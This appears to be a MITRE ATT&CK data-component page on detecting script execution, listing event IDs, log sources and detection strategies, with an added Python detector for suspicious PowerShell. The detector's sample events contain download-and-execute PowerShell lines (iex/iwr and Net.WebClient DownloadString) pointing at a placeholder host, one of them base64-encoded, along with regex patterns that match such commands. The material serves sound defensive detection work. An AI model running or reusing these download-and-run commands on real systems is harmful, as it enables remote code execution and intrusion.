Script Execution

The execution of a text file that contains code via the interpreter.

Data Collection Measures:

  • Windows Event Logs:
    • Event ID 4104 (PowerShell Script Block Logging) – Captures full command-line execution of PowerShell scripts.
    • Event ID 4688 (Process Creation) – Detects script execution by tracking process launches (powershell.exe, wscript.exe, cscript.exe).
    • Event ID 5861 (Script Execution) – Captures script execution via Windows Defender AMSI logging.
  • Sysmon (Windows):
    • Event ID 1 (Process Creation) – Monitors script execution initiated by scripting engines.
    • Event ID 11 (File Creation) – Detects new script files written to disk before execution.
  • Endpoint Detection and Response (EDR) Tools:
    • Track script execution behavior, detect obfuscated commands, and prevent malicious scripts.
  • PowerShell Logging:
    • Enable Module Logging: Logs all loaded modules and cmdlets.
    • Enable Script Block Logging: Captures complete PowerShell script execution history.
  • SIEM Detection Rules:
    • Detect script execution with obfuscated, encoded, or remote URLs.
    • Alert on script executions using -EncodedCommand or iex(iwr).
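The SIEM rules listed above (encoded commands, remote URLs, iex(iwr)) reduce to a few string and decode checks over 4688 command lines and 4104 script blocks. The Python below is an added example, not part of this ATT&CK page or any MITRE tooling; the event records are constructed samples (the field names, file paths and the host example.invalid are assumptions), and the detector also decodes the -EncodedCommand payload so that iex/iwr and URL indicators hidden in base64 are still caught rather than missed because they never appear in plain text on the command line.

```python
"""Toy detector for script-execution telemetry (DC0029 style).

Constructed sample events loosely modelled on Windows Security 4688 (process
creation) and PowerShell 4104 (script block) records. Not real telemetry.
"""
import base64
import re
from typing import Optional

# Scripting engines named on the page, plus pwsh.exe (PowerShell 7, assumption).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}

# -EncodedCommand and the abbreviations powershell.exe accepts (-e, -ec, -enc).
ENCODED_FLAG_RE = re.compile(r"(?i)(?<!\S)-(?:e|ec|enc|encodedcommand)\s+(\S+)")
# Invoke-Expression fed by a download: iex(iwr ...), IEX (New-Object Net.WebClient).DownloadString(...)
IEX_RE = re.compile(r"(?i)\b(?:iex|invoke-expression)\b")
DOWNLOAD_RE = re.compile(
    r"(?i)\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile|net\.webclient)\b"
)
URL_RE = re.compile(r"(?i)\bhttps?://[^\s'\")]+")


def decode_encoded_command(token: str) -> Optional[str]:
    """Decode a -EncodedCommand argument (base64 of UTF-16LE text); None if it does not decode."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def inspect_text(text: str) -> list:
    """Return reasons a command line or script block matches the page's indicators."""
    reasons = []
    if IEX_RE.search(text) and DOWNLOAD_RE.search(text):
        reasons.append("invoke-expression fed by a download cmdlet (iex/iwr pattern)")
    urls = URL_RE.findall(text)
    if urls:
        reasons.append("remote URL referenced: " + ", ".join(urls))
    return reasons


def analyze_event(event: dict) -> list:
    """Map one 4688- or 4104-style record to alert reasons (empty list = no alert)."""
    reasons = []
    if event["event_id"] == 4688:
        image = event["image"].rsplit("\\", 1)[-1].lower()
        if image not in SCRIPT_HOSTS:
            return reasons  # not a scripting engine; out of scope for this check
        cmd = event["command_line"]
        m = ENCODED_FLAG_RE.search(cmd)
        if m:
            reasons.append("-EncodedCommand used")
            decoded = decode_encoded_command(m.group(1))
            if decoded is None:
                reasons.append("encoded payload did not decode as base64/UTF-16LE")
            else:
                reasons.extend("decoded payload: " + r for r in inspect_text(decoded))
        reasons.extend(inspect_text(cmd))
    elif event["event_id"] == 4104:
        reasons.extend(inspect_text(event["script_block"]))
    return reasons


def scan(events: list) -> list:
    """Return (event_id, reasons) for every event that produced at least one reason."""
    hits = []
    for e in events:
        reasons = analyze_event(e)
        if reasons:
            hits.append((e["event_id"], reasons))
    return hits


# Constructed: the payload is built here so the sample is reproducible, not copied from anywhere.
ENCODED_PAYLOAD = base64.b64encode(
    "iex (iwr http://example.invalid/a.ps1)".encode("utf-16-le")
).decode("ascii")

SAMPLE_EVENTS = [
    {"event_id": 4688, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -NoProfile -EncodedCommand {ENCODED_PAYLOAD}"},
    {"event_id": 4688, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -File C:\scripts\nightly-backup.ps1"},  # benign: no indicator
    {"event_id": 4688, "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe http://example.invalid/readme.txt"},  # not a script host
    {"event_id": 4104,
     "script_block": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')"},
    {"event_id": 4104, "script_block": "Get-Process | Where-Object CPU -gt 10"},  # benign
]

if __name__ == "__main__":
    for event_id, reasons in scan(SAMPLE_EVENTS):
        print(event_id, "->", "; ".join(reasons))
```

Of the five constructed records only two alert: the encoded 4688 (flagged for the flag itself and, after decoding, for the iex/iwr pair and the URL) and the DownloadString script block. The plain -File launch and the non-script-host process produce nothing, which is the point of keying the 4688 check on the image name rather than on any URL-looking string.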

ID: DC0029
Domains: ICS, Enterprise
Version: 2.0
Created: 20 October 2021
Last Modified: 21 October 2025

Log Sources

Name | Channel
ApplicationLogs:SQL | Stored procedure creation or modification with shell invocation (e.g., system(), exec())
auditd:PROCTITLE | scripting loop invoking sleep/ping
azure:activity | Microsoft.Compute/virtualMachines/runCommand/action: Abnormal initiation of Azure RunCommand jobs or PowerShell/Bash payloads
EDR:AMSI | Malicious inline C#/script blobs embedded in MSBuild projects if intercepted by AMSI-aware loaders (rare but possible via chained LOLBins)
EDR:scriptblock | Process Tree + Script Block Logging
esxi:shell | None
esxi:vmkernel | boot
etw:Microsoft-Antimalware-Scan-Interface | Amsi/Script content + API verdicts during in-memory staging
linux:syslog | /var/log/syslog
linux:syslog | boot logs
m365:defender | ScriptBlockLogging + AMSI
m365:office | VBA auto_open, auto_close, or document_open events
m365:unified | Scripted Activity
macos:osquery | exec: Unexpected execution of osascript or AppleScript targeting sensitive apps
macos:syslog | system.log, asl.log
macos:unifiedlog | log stream --predicate 'eventMessage contains "python"'
macos:unifiedlog | log stream --predicate 'eventMessage contains "wscript" OR "vbs"'
macos:unifiedlog | osascript or AppleScript invocation modifying UI
macos:unifiedlog | log
macos:unifiedlog | AppleScript creating login item via 'System Events' dictionary
macos:unifiedlog | subsystem=launchservices
macos:unifiedlog | log stream with predicate 'eventMessage CONTAINS "osascript"'
macos:unifiedlog | subsystem=com.apple.Security or com.apple.applescript
macos:unifiedlog | osascript, AppleScript, or Python execution triggered immediately after HID connection
networkdevice:runtime | runtime
Script | None
WinEventLog:Application | Stored procedure creation, modification, or xp_cmdshell invocation via SQL logs or SQL Server auditing
WinEventLog:PowerShell | EventCode=4103, 4104
WinEventLog:PowerShell | Set-ADUser or Set-ADAuthenticationPolicy with MFA attributes disabled
WinEventLog:PowerShell | Scripts with references to XML parsing, AES decryption, or gpprefdecrypt logic
WinEventLog:System | EventCode=1502, 1503
WinEventLog:System | EventCode=4016,5312

Detection Strategy

ID | Name | Technique Detected
DET0186 | Automated File and API Collection Detection Across Platforms | T1119
DET0124 | Behavior-chain detection for T1132.001 Data Encoding: Standard Encoding (Base64/Hex/MIME) across Windows, Linux, macOS, ESXi | T1132.001
DET0326 | Behavior-chain detection for T1132.002 Data Encoding: Non-Standard Encoding across Windows, Linux, macOS, ESXi | T1132.002
DET0556 | Behavior-chain detection strategy for T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild (Windows) | T1127.001
DET0010 | Behavioral Detection of Event Triggered Execution Across Platforms | T1546
DET0357 | Behavioral Detection of Internet Connection Discovery | T1016.001
DET0521 | Behavioral Detection of Spoofed GUI Credential Prompts | T1056.002
DET0384 | Behavioral Detection of Unix Shell Execution | T1059.004
DET0076 | Behavioral Detection of Visual Basic Execution (VBS/VBA/VBScript) | T1059.005
DET0202 | Behavioral Detection of Windows Command Shell Execution | T1059.003
DET0112 | Boot or Logon Initialization Scripts Detection Strategy | T1037
DET0063 | Cross-Platform Behavioral Detection of Python Execution | T1059.006
DET0264 | Cross-Platform Detection of JavaScript Execution Abuse | T1059.007
DET0493 | Detect Abuse of Inter-Process Communication (T1559) | T1559
DET0381 | Detect Access and Decryption of Group Policy Preference (GPP) Credentials in SYSVOL | T1552.006
DET0072 | Detect Logon Script Modifications and Execution | T1037.001
DET0190 | Detect MFA Modification or Disabling Across Platforms | T1556.006
DET0367 | Detect Network Logon Script Abuse via Multi-Event Correlation on Windows | T1037.003
DET0734 | Detection of Automated Collection | T0802
DET0749 | Detection of Data from Local System | T0893
DET0770 | Detection of Network Connection Enumeration | T0840
DET0735 | Detection of Scripting | T0853
DET0793 | Detection of System Binary Proxy Execution | T0894
DET0237 | Detection Strategy for Boot or Logon Initialization Scripts: RC Scripts | T1037.004
DET0545 | Detection Strategy for Cloud Administration Command | T1651
DET0568 | Detection Strategy for Input Injection | T1674
DET0101 | Detection Strategy for Lua Scripting Abuse | T1059.011
DET0300 | Detection Strategy for Reflective Code Loading | T1620
DET0181 | Detection Strategy for SQL Stored Procedures Abuse via T1505.001 | T1505.001
DET0121 | Detection Strategy for T1547.015 – Login Items on macOS | T1547.015
DET0587 | Enumeration of User or Account Information Across Platforms | T1087
DET0082 | Internal Website and System Content Defacement via UI or Messaging Modifications | T1491.001
DET0372 | Multi-Platform Detection Strategy for T1678 - Delay Execution | T1678